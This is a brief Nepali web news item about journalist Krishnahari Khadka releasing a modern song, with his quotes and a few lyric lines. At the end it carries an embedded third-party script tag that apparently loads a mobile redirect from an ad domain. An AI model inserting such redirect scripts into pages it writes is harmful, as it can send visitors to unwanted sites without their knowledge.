कृष्णहरिको आधुनिक गित ‘किन माग्यौं मेरो माया’ सार्वजनिक। संञ्चारकर्मी कृष्णहरी खड्काको स्वरमा रहेको आाधुनिक गीत छल सार्वजनिक भएको छ । लामो समय सन्चार क्षेत्रमा काम गरेर प्रवासीएका संचारकर्मी खड्काले आधुनिक गीत छल बजारमा ल्याएका हुन् । सानै ऊमेर देखी गाउने रहर थियो अझ रेडियो क्षेत्रमा लागेपछि संगीतमा एकखाले नसा बस्यो l त्यसैको प्रभाव अहिले छल बजारमा ल्याँएको छु खड्काले सुनाए। किन माग्यौं मेरो माया छोडेर जानु रैछ। बिछोडको किला मनमा खोपेर जानु रैछ। बोलको गित प्रेमीकाले आफुलाई छाडेर गएपछि प्रेमीकालाई गरीएको गुनासो सहितको भाव गीतले बोकेको छ गाएकले जानाकारी दिए ।
<script type="text/javascript" src="//ylx-4.com/mobile_redir.php?section=General&pub=777952&ga=g"></script>
 
Top